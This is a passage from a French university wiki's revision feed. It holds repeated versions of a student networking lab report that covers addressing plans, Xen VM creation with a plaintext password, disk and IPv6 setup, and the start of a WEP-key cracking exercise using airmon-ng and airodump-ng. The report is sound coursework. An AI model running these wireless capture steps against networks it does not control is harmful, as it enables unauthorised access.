    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons la VM avec '''CTRL +''' [&lt;br /&gt;
Pour y retourner:&lt;br /&gt;
 xen console Paixdieu&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef012de1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Lancement de la capture des paquets :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlx40a5ef012de1&lt;br /&gt;
&lt;br /&gt;
BSSID choisi :&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09 =&amp;gt; kracotte10&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56280</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56280"/>
				<updated>2021-10-25T15:58:12Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : /* 3. Configuration des Machines Virtuelles */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu1,xvda3,w',&lt;br /&gt;
  		  'phy:/dev/storage/Paixdieu2,xvda4,w''''&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,'''bridge=IMA5sc'''' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 !/dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 !/dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 '''lsblk'''&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 '''xvda3 202:3 0 10G 0 disk /home&lt;br /&gt;
 xvda4 202:4 0 10G 0 disk /var'''&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
 &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.188&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''iface eth0 inet6 auto''' &lt;br /&gt;
&lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons la VM avec '''CTRL +''' [&lt;br /&gt;
Pour y retourner:&lt;br /&gt;
 xen console Paixdieu&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef012de1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Lancement de la capture des paquets :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlx40a5ef012de1&lt;br /&gt;
&lt;br /&gt;
BSSID choisi :&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09 =&amp;gt; kracotte10&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56279</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56279"/>
				<updated>2021-10-25T15:55:43Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : /* 3. Configuration des Machines Virtuelles */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
